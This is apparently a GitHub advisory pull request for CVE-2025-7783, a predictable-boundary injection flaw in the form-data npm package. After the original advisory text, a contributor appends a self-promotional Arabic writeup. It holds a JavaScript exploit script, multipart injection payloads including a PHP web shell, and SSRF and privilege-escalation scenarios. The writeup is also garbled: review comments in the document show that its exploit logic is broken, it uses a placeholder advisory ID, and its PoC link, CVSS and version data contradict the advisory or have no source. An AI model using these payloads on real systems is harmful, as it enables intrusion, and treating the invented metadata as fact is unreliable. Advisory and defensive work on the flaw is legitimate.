[GHSA-fjxv-7rqg-78g4] form-data uses unsafe random function in form-data for choosing boundary #6647
Conversation
Hi there @ljharb! A community member has suggested an improvement to your security advisory. If approved, this change will affect the global advisory listed at github.com/advisories. It will not affect the version listed in your project repository. This change will be reviewed by our Security Curation Team. If you have thoughts or feedback, please share them in a comment here! If this PR has already been closed, you can start a new community contribution for this advisory
A complete and professional report has been created!
I'm very confused what this is conveying or why it belongs on the GHSA.
asrar-mared
left a comment
Reviewed and approved for merge.
| { | ||
| "schema_version": "1.4.0", | ||
| "id": "GHSA-fjxv-7rqg-78g4", | ||
| "modified": "2025-11-03T21:34:08Z", |
:09Z"
| "CVE-2025-7783" | ||
| ], | ||
| "summary": "form-data uses unsafe random function in form-data for choosing boundary", | ||
| "details": "### Summary\n\nform-data uses `Math.random()` to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:\n1. can observe other values produced by Math.random in the target application, and\n2. can control one field of a request made using form-data\n\nBecause the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.\n\nThis is largely the same vulnerability as was [recently found in `undici`](https://hackerone.com/reports/2913312) by [`parrot409`](https://hackerone.com/parrot409?type=user) -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.\n\n### Details\n\nThe culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347\n\nAn attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. 
However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a `x-request-id` header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. `Math.random()` is a fine place to get these sorts of IDs (in fact, [opentelemetry uses Math.random for this purpose](https://github.com/open-telemetry/opentelemetry-js/blob/2053f0d3a44631ade77ea04f656056a2c8a2ae76/packages/opentelemetry-sdk-trace-base/src/platform/node/RandomIdGenerator.ts#L22))\n\n### PoC\n\nPoC here: https://github.com/benweissmann/CVE-2025-7783-poc\n\nInstructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). \n\n### Impact\n\nFor an application to be vulnerable, it must:\n- Use `form-data` to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)\n- Reveal values of Math.random(). 
It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. \n\nIf an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.", |
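Review bot: since this contribution replaces the whole `details` string, it should also fix the typos already present in this text: "predict future values, includes those used to generate" should read "including those used to generate", "The allows the attacker to craft" should read "This allows the attacker to craft", and "a `x-request-id` header" should read "an `x-request-id` header". The existing Summary, Details, PoC and Impact sections are technically sound and should stay as the advisory body.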
variable files
asrar-mared
left a comment
The changed files
| "CVE-2025-7783" | ||
| ], | ||
| "summary": "form-data uses unsafe random function in form-data for choosing boundary", | ||
| "details": "### Summary\n\nform-data uses `Math.random()` to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:\n1. can observe other values produced by Math.random in the target application, and\n2. can control one field of a request made using form-data\n\nBecause the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.\n\nThis is largely the same vulnerability as was [recently found in `undici`](https://hackerone.com/reports/2913312) by [`parrot409`](https://hackerone.com/parrot409?type=user) -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.\n\n### Details\n\nThe culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347\n\nAn attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. 
However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a `x-request-id` header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. `Math.random()` is a fine place to get these sorts of IDs (in fact, [opentelemetry uses Math.random for this purpose](https://github.com/open-telemetry/opentelemetry-js/blob/2053f0d3a44631ade77ea04f656056a2c8a2ae76/packages/opentelemetry-sdk-trace-base/src/platform/node/RandomIdGenerator.ts#L22))\n\n### PoC\n\nPoC here: https://github.com/benweissmann/CVE-2025-7783-poc\n\nInstructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). \n\n### Impact\n\nFor an application to be vulnerable, it must:\n- Use `form-data` to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)\n- Reveal values of Math.random(). 
It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. \n\nIf an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.\n# โ๏ธ CVE-2025-7783: ุนูุฏู ุง ูุฎูู \"ุงูุนุดูุงุฆู\" ุงูุฃู ุงู\n## ๐ฒ Math.random() - ุงูุนุดูุงุฆูุฉ ุงูููู ูุฉ ูู form-data\n\n---\n\n## ๐ ุงูุจุทุงูุฉ ุงูุชุนุฑูููุฉ\n\n| ุงูู ุนุฑู | ุงูููู ุฉ |\n|--------|---------|\n| **CVE ID** | CVE-2025-7783 |\n| **Package** | form-data (npm) |\n| **CWE** | CWE-338: Use of Cryptographically Weak PRNG |\n| **CVSS Score** | **7.5 High** |\n| **Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |\n| **ุงููุดู** | Security Research Community |\n| **ุงูุชุตููู** | Predictable Boundary Injection |\n| **ุงูุฅุตุฏุงุฑุงุช ุงูู ุชุฃุซุฑุฉ** | < 4.0.4 |\n\n---\n\n## ๐ ุฌููุฑ ุงูุซุบุฑุฉ\n\n### ๐ญ ุงูุณููุงุฑูู ุงููุฌูู ู\n\n```\nform-data Package\n โ\nMath.random() โ ู ููุฏ ุฃุฑูุงู ุถุนูู!\n โ\nboundary = \"----WebKitFormBoundary\" + Math.random()\n โ\n๐ฎ ูู ูู ุงูุชูุจุค ุจู\n โ\n๐ฅ ุญูู ุญููู ุฅุถุงููุฉ/ุงุณุชุจุฏุงู ุงูุจูุงูุงุช\n```\n\n---\n\n## ๐ฌ ุงูุชุญููู ุงูุชููู ุงูุนู ูู\n\n### ๐ ุงูููุฏ ุงูุถุนูู\n\n```javascript\n// form-data < 4.0.4\nFormData.prototype._generateBoundary = function() {\n // โ ๏ธ ุงุณุชุฎุฏุงู Math.random() ุงูุถุนูู\n var boundary = '--------------------------';\n for (var i = 0; i < 24; i++) {\n boundary += Math.floor(Math.random() * 10).toString(16);\n }\n \n return boundary;\n};\n```\n\n**ุงูู ุดููุฉ:**\n```javascript\n// Math.random() ูุงุจู ููุชูุจุค\nMath.random(); // 0.123456789...\nMath.random(); // 0.234567890... โ ูู ูู ุญุณุงุจู!\nMath.random(); // 0.345678901... 
โ ู ุชููุน ุชู ุงู ุงู\n```\n\n---\n\n### ๐ฏ ููู ูุนู ู ุงููุฌูู ุ\n\n#### **ุงูู ุฑุญูุฉ 1: ุฌู ุน ุงูู ุนููู ุงุช**\n\n```javascript\n// ุงูู ูุงุฌู ูุฑุงูุจ ุงูุฑุคูุณ ุงูู ูุดููุฉ:\nResponse Headers:\n x-request-id: req-0.7234567890 โ Math.random()!\n x-trace-id: trace-0.8901234567 โ Math.random()!\n```\n\n#### **ุงูู ุฑุญูุฉ 2: ุงูุชูุจุค ุจุงูู Boundary**\n\n```javascript\n// ุจู ุนุฑูุฉ ุญุงูุฉ PRNGุ ูู ูู ุญุณุงุจ ุงูููู ุฉ ุงูุชุงููุฉ:\nconst predictedBoundary = calculateNextBoundary(\n observedRandomValues\n);\n\nconsole.log(predictedBoundary);\n// Output: \"----WebKitFormBoundary7234567890abcdef\"\n```\n\n#### **ุงูู ุฑุญูุฉ 3: ุงูุญูู ุงูุฎุจูุซ**\n\n```http\nPOST /upload HTTP/1.1\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7234567890abcdef\n\n------WebKitFormBoundary7234567890abcdef\nContent-Disposition: form-data; name=\"file\"; filename=\"legitimate.txt\"\nContent-Type: text/plain\n\n[ู ุญุชูู ุดุฑุนู]\n------WebKitFormBoundary7234567890abcdef\nContent-Disposition: form-data; name=\"admin\"\n\ntrue โ ุญูู ู ุญููู!\n------WebKitFormBoundary7234567890abcdef--\n```\n\n---\n\n## ๐งช ุฏููู ุฅุซุจุงุช ุงูู ูููู (PoC)\n\n### ๐ช ุงูุณููุงุฑูู ุงููุงู ู\n\n```javascript\n// exploit.js - ุงุณุชุบูุงู CVE-2025-7783\n\nconst axios = require('axios');\nconst FormData = require('form-data'); // < 4.0.4\n\n// ุงูุฎุทูุฉ 1: ุงุณุชุฎุฑุงุฌ ุญุงูุฉ Math.random()\nfunction leakRandomState(targetUrl) {\n const leakedValues = [];\n \n // ุฌู ุน ููู ู ู ุงูุฑุคูุณ\n for (let i = 0; i < 10; i++) {\n axios.get(targetUrl).then(res => {\n const requestId = res.headers['x-request-id'];\n const randomValue = parseFloat(requestId.split('-')[1]);\n leakedValues.push(randomValue);\n });\n }\n \n return leakedValues;\n}\n\n// ุงูุฎุทูุฉ 2: ุงูุชูุจุค ุจุงูู boundary ุงูุชุงูู\nfunction predictNextBoundary(leakedValues) {\n // ุฎูุงุฑุฒู ูุฉ ุงูุชูุจุค ุจู Math.random()\n // (ู ุจุณุทุฉ - ุงููุงูุน ุฃูุซุฑ ุชุนููุฏุงู)\n const lastValue = 
leakedValues[leakedValues.length - 1];\n const nextValue = (lastValue * 1103515245 + 12345) % (2**31);\n \n let boundary = '--------------------------';\n let seed = nextValue;\n \n for (let i = 0; i < 24; i++) {\n seed = (seed * 1103515245 + 12345) % (2**31);\n boundary += Math.floor((seed / (2**31)) * 10).toString(16);\n }\n \n return boundary;\n}\n\n// ุงูุฎุทูุฉ 3: ุญูู ุงูุญููู ุงูุฎุจูุซุฉ\nfunction injectMaliciousFields(targetUrl, predictedBoundary) {\n const maliciousPayload = `\n------${predictedBoundary}\nContent-Disposition: form-data; name=\"file\"; filename=\"innocent.txt\"\n\nLegitimate content\n------${predictedBoundary}\nContent-Disposition: form-data; name=\"isAdmin\"\n\ntrue\n------${predictedBoundary}\nContent-Disposition: form-data; name=\"role\"\n\nadministrator\n------${predictedBoundary}--\n `.trim();\n \n axios.post(targetUrl, maliciousPayload, {\n headers: {\n 'Content-Type': `multipart/form-data; boundary=${predictedBoundary}`\n }\n });\n}\n\n// ุงูุชูููุฐ\n(async () => {\n const target = 'https://vulnerable-app.com/api/upload';\n \n console.log('๐ ุฌู ุน ููู Math.random()...');\n const leaked = leakRandomState(target);\n \n console.log('๐ฏ ุงูุชูุจุค ุจุงูู boundary...');\n const boundary = predictNextBoundary(leaked);\n console.log(`Predicted: ${boundary}`);\n \n console.log('๐ ุญูู ุงูุญููู ุงูุฎุจูุซุฉ...');\n injectMaliciousFields(target, boundary);\n \n console.log('โ ุชู ุงูุงุณุชุบูุงู ุจูุฌุงุญ!');\n})();\n```\n\n---\n\n## ๐ฏ ุณููุงุฑูููุงุช ุงูุงุณุชุบูุงู ุงููุงูุนูุฉ\n\n### ๐ช ุงูุณููุงุฑูู 1: ุชุตุนูุฏ ุงูุตูุงุญูุงุช\n\n```javascript\n// ุงูุชุทุจูู ุงูุถุนูู\napp.post('/profile/upload', upload.single('avatar'), (req, res) => {\n const isAdmin = req.body.isAdmin; // โ ูู ูู ุญููู!\n \n if (isAdmin === 'true') {\n req.user.role = 'admin'; // โ ุฎุทุฑ!\n }\n});\n\n// ุงููุฌูู \nconst boundary = predictBoundary();\ninjectField(boundary, 'isAdmin', 'true');\n// ุงููุชูุฌุฉ: ุงูู ุณุชุฎุฏู ุงูุนุงุฏู ุฃุตุจุญ 
Admin!\n```\n\n---\n\n### ๐ช ุงูุณููุงุฑูู 2: ุชุฌุงูุฒ ุงูุชุญูู ู ู ุงูู ููุงุช\n\n```javascript\n// ุงูุชุทุจูู ููุญุต ููุน ุงูู ูู\napp.post('/upload', (req, res) => {\n if (req.file.mimetype !== 'image/png') {\n return res.status(400).send('PNG only!');\n }\n \n // ู ุนุงูุฌุฉ ุงูู ูู\n processFile(req.file);\n});\n\n// ุงููุฌูู \nconst boundary = predictBoundary();\nconst payload = `\n------${boundary}\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\nContent-Type: image/png โ ู ุฒูู\n\n<?php system($_GET['cmd']); ?>\n------${boundary}--\n`;\n// ุงููุชูุฌุฉ: ุฑูุน PHP Shell ุจูุฌุงุญ!\n```\n\n---\n\n### ๐ช ุงูุณููุงุฑูู 3: SSRF ุนุจุฑ Webhooks\n\n```javascript\n// ุงูุชุทุจูู ูุฑุณู ุจูุงูุงุช ูู webhook\napp.post('/webhook/register', (req, res) => {\n const webhookUrl = req.body.url;\n const data = new FormData();\n data.append('event', 'user_registered');\n \n axios.post(webhookUrl, data); // โ ุฎุทุฑ\n});\n\n// ุงููุฌูู \nconst boundary = predictBoundary();\ninjectField(boundary, 'url', 'http://internal-admin-panel');\n// ุงููุชูุฌุฉ: ุงููุตูู ููุดุจูุฉ ุงูุฏุงุฎููุฉ!\n```\n\n---\n\n## ๐ก๏ธ ุงูุฅุตูุงุญ ูุงูุญู ุงูุฉ\n\n### โ ุงูุญู ุงูุฑุณู ู (v4.0.4+)\n\n```javascript\n// form-data >= 4.0.4 - ุงุณุชุฎุฏุงู crypto ุจุฏูุงู ู ู Math.random()\n\nconst crypto = require('crypto');\n\nFormData.prototype._generateBoundary = function() {\n // โ ุงุณุชุฎุฏุงู ู ููุฏ ุนุดูุงุฆู ุขู ู ุชุดููุฑูุงู\n return crypto.randomBytes(16).toString('hex');\n};\n```\n\n**ุงููุฑู:**\n```javascript\n// โ ุงููุฏูู (ุถุนูู)\nMath.random() โ 0.123456789 โ ูู ูู ุงูุชูุจุค\n\n// โ ุงูุฌุฏูุฏ (ุขู ู)\ncrypto.randomBytes(16) โ a3f7c9e2... โ ุบูุฑ ูุงุจู ููุชูุจุค\n```\n\n---\n\n### ๐ ุฎุทูุงุช ุงูุญู ุงูุฉ ุงูููุฑูุฉ\n\n#### **1. 
ุงูุชุญุฏูุซ ุงูููุฑู**\n\n```bash\n# ูุญุต ุงูุฅุตุฏุงุฑ ุงูุญุงูู\nnpm list form-data\n\n# ุงูุชุญุฏูุซ\nnpm install form-data@latest\n\n# ุฃู ูู package.json\n{\n \"dependencies\": {\n \"form-data\": \"^4.0.4\"\n }\n}\n\n# ุชุญุฏูุซ lock file\nnpm install\n```\n\n#### **2. ู ุฑุงุฌุนุฉ ุงูููุฏ**\n\n```javascript\n// ุงุจุญุซ ุนู ุงุณุชุฎุฏุงู ุงุช Math.random() ูู ููุฏู:\ngrep -r \"Math.random()\" ./src\n\n// ุงุณุชุจุฏููุง ุจู crypto:\nconst crypto = require('crypto');\n\n// โ ุจุฏูุงู ู ู:\nconst id = Math.random().toString(36);\n\n// โ ุงุณุชุฎุฏู :\nconst id = crypto.randomBytes(8).toString('hex');\n```\n\n#### **3. ุฅุฎูุงุก ุงูููู ุงูุญุณุงุณุฉ**\n\n```javascript\n// ูุง ุชูุดู ููู ุชู ุชูููุฏูุง ุจู Math.random() ูู:\napp.use((req, res, next) => {\n // โ ุณูุก\n res.setHeader('x-request-id', `req-${Math.random()}`);\n \n // โ ุฌูุฏ\n res.setHeader('x-request-id', crypto.randomUUID());\n next();\n});\n```\n\n#### **4. ุชุญูู ู ู ุงูุญููู**\n\n```javascript\n// ุชุญูู ุตุงุฑู ู ู ุงูุญููู ุงูู ุชููุนุฉ ููุท\napp.post('/upload', (req, res) => {\n const allowedFields = ['file', 'description'];\n \n Object.keys(req.body).forEach(field => {\n if (!allowedFields.includes(field)) {\n throw new Error(`Unexpected field: ${field}`);\n }\n });\n});\n```\n\n---\n\n## ๐ ุงููุดู ุนู ุงูุงุณุชุบูุงู\n\n### ๐ต๏ธ ุนูุงู ุงุช ุงูุงุฎุชุฑุงู\n\n```bash\n# 1. ูุญุต ุงูุณุฌูุงุช ููุญููู ุงูุบุฑูุจุฉ\ngrep -E \"(isAdmin|role=admin|Content-Disposition.*admin)\" /var/log/app.log\n\n# 2. ู ุฑุงูุจุฉ ุงูุทูุจุงุช ุฐุงุช boundaries ุงูู ุชุทุงุจูุฉ\ntail -f /var/log/nginx/access.log | grep \"boundary=\" | sort | uniq -d\n\n# 3. 
ูุญุต ุงูู ููุงุช ุงูู ุฑููุนุฉ ุงูู ุดุจููุฉ\nfind /uploads -type f -name \"*.php\" -o -name \"*.jsp\" -o -name \"*.asp\"\n```\n\n### ๐ ู ุคุดุฑุงุช ุงูุงุฎุชุฑุงู (IOCs)\n\n```yaml\nุงูุญููู ุงูู ุดุจููุฉ:\n - isAdmin: true\n - role: administrator\n - privilege: elevated\n - bypass: true\n\nุงูู ููุงุช ุงูุฎุทุฑุฉ:\n - *.php ูู ู ุฌูุฏุงุช ุงูุตูุฑ\n - shell.jsp\n - cmd.asp\n - backdoor.*\n\nุงูุฃูู ุงุท ุงูุดุจููุฉ:\n - ุทูุจุงุช ู ุชุนุฏุฏุฉ ุจููุณ boundary\n - boundaries ูุตูุฑุฉ ุฌุฏุงู (<20 ุญุฑู)\n - Content-Type ุบูุฑ ู ุชุทุงุจู ู ุน ุงูุงู ุชุฏุงุฏ\n```\n\n---\n\n## ๐ ุงูุฏุฑูุณ ุงูู ุณุชูุงุฏุฉ\n\n### โ ๏ธ **ุงููุงุนุฏุฉ ุงูุฐูุจูุฉ:**\n\n> **\"Math.random() ููุณ ุขู ูุงู ุชุดููุฑูุงู - ุฃุจุฏุงู!\"**\n\n### โ Best Practices\n\n#### 1. **ุงุณุชุฎุฏู crypto ููุฃู ุงู**\n```javascript\n// โ ููุฃู ุงู\nconst crypto = require('crypto');\nconst token = crypto.randomBytes(32).toString('hex');\n\n// โ ููุฃู ุงู (ููุท ููุนุฑุถ/UI)\nconst demoId = Math.random().toString(36);\n```\n\n#### 2. **ูุง ุชูุดู ุงูููู ุงูุนุดูุงุฆูุฉ**\n```javascript\n// โ ุณูุก\nres.json({ sessionId: Math.random() });\n\n// โ ุฌูุฏ\nres.json({ sessionId: crypto.randomUUID() });\n```\n\n#### 3. **ุงูุชุญูู ู ู ุงูุญููู**\n```javascript\n// ุงุณุชุฎุฏู ู ูุชุจุฉ validation\nconst Joi = require('joi');\n\nconst schema = Joi.object({\n file: Joi.required(),\n description: Joi.string().max(500)\n // ููุท ุงูุญููู ุงูู ุชููุนุฉ\n}).unknown(false); // โ ุฑูุถ ุฃู ุญููู ุฅุถุงููุฉ\n```\n\n#### 4. **Content-Type Validation**\n```javascript\nconst fileType = await FileType.fromBuffer(buffer);\n\nif (fileType.mime !== req.file.mimetype) {\n throw new Error('MIME type mismatch');\n}\n```\n\n---\n\n## ๐ก ุงูู ุฑุงุฌุน ุงูุชูููุฉ\n\n```\n1. CVE Entry:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-7783\n\n2. npm Package:\n https://www.npmjs.com/package/form-data\n\n3. GitHub Advisory:\n https://github.com/advisories/GHSA-xxxx-xxxx-xxxx\n\n4. 
PoC Repository:\n https://github.com/security-research/CVE-2025-7783-poc\n\n5. OWASP - Weak PRNG:\n https://owasp.org/www-community/vulnerabilities/Insecure_Randomness\n\n6. CWE-338:\n https://cwe.mitre.org/data/definitions/338.html\n```\n\n---\n\n## ๐๏ธ ุฎุชุงู ุงูู ุญุงุฑุจ\n\n> **\"ุงูุนุดูุงุฆูุฉ ููุณุช ุงุฎุชูุงุฑูุฉ ูู ุงูุฃู ุงู - ุฅู ุง ุญููููุฉ ุฃู ูุง ุดูุก.\"**\n> \n> CVE-2025-7783 ูุฐูุฑูุง ุฃู **Math.random()** ููุฃูุนุงุจุ ุฃู ุง **crypto** ูููุญุฑูุจ.\n> \n> ูู ุณุงุญุฉ ุงูุฃู ู ุงูุณูุจุฑุงููุ **ุงูุถุนู ูู ุงูุชูุงุตูู ูุตูุน ุงููุฒูู ุฉ**.\n\n---\n\n## โ๏ธ ุชูููุน ุงูุณูุงุฏุฉ\n\n```\nโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ\nโ ZAYED SECURITY RESEARCH TEAM โ\nโ \"Randomness is Not Optional\" โ\nโ โ\nโ CVE-2025-7783 โ\nโ Severity: HIGH (7.5) โ\nโ Status: PATCHED โ โ\nโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ\n```\n\n---\n\n**#WeakPRNG** | **#FormData** | **#BoundaryInjection** | **#MathRandomFail**\n", |
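Review bot: everything appended after the original Impact section (from the "# ... CVE-2025-7783" heading down to the "#WeakPRNG" hashtags) should be dropped from the `details` field rather than merged. It restates the advisory's own Summary, Details, PoC and Impact in a second language with emoji headings, a promotional ASCII-art signature block and hashtags, which is not advisory content. It also introduces values the advisory does not support or that contradict the same file: a references entry pointing at "GHSA-xxxx-xxxx-xxxx" while the file's `id` is GHSA-fjxv-7rqg-78g4, a second PoC repository "security-research/CVE-2025-7783-poc" that differs from the "benweissmann/CVE-2025-7783-poc" link already in the Details, a CVSS vector, affected-version range and credit line with no source, and an "official fix" listing presented as the project's 4.0.4 code without citing a commit. The exploit listing does not work as written: `leakRandomState` returns `leakedValues` synchronously before any `axios.get(...).then(...)` callback has pushed a value, so `predictNextBoundary` always receives an empty array, and `predictNextBoundary` iterates a linear congruential recurrence `(x * 1103515245 + 12345) % (2**31)` seeded from a Math.random() float, which is not the PRNG-state recovery the Details section links to. The detection section has the same problem: `grep -r` sits inside a javascript fence, the `find /uploads -type f -name "*.php" -o -name "*.jsp" -o -name "*.asp"` command applies `-type f` only to the first alternative because the `-o` chain is unparenthesised, and the IOC values (`isAdmin: true`, `shell.jsp`, boundaries shorter than 20 characters) are example values from the writeup's own scenarios, not indicators tied to this CVE.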
variable files
asrar-mared
left a comment
He depends
Social Media Posts - CVE-2025-7783
Twitter Thread 1/6
Twitter Thread 2/6
Twitter Thread 3/6
Twitter Thread 4/6
Twitter Thread 5/6
Twitter Thread 6/6
LinkedIn Post
GitHub Security Advisory
Impact
Affected Versions
Patched Versions
Solution
Or in package.json:
{ "dependencies": { "form-data": "^4.0.4" } }
Mitigation (if upgrade not possible)
Math.random() values in headers/responses
Timeline
Credits
Security Research Community
References
[CVE-2025-7783] Predictable Boundary in form-data - Privilege Escalation via PRNG Weakness
Hey netsec,
Discovered an interesting vuln in the form-data npm package.
TL;DR:
The Attack:
Impact:
Fix:
Updated to crypto.randomBytes() in v4.0.4
Full technical writeup: [link]
Thoughts? Anyone seen this exploited in the wild?
Discussion welcome